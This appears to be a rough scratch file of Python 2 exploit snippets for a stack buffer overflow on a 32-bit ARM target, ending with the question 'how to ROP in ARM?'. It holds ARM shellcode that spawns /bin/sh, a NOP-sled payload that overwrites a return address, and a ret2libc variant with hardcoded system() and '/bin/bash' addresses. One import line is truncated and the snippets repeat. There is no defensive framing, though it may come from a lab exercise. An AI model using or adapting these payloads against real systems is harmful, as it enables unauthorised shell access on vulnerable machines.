import sys
import o

payload = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"

# 0xbefffd8c - /bin/bash
print "\x90" * (164-34) + "C" * 34 + "\x68\xfa\xff\xbe"
print "n"


import sys
import os

payload = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"

# 0xbefffd8c - /bin/bash
# 0xb6f17780 - system_libc  (ret2sytem_libc OK)
print "A" * (164-34) + "C" * 34 + "\x80\x77\xf1\xb6" + "\x8c\xfd\xff\xbe"
print "n"


how to ROP in ARM?
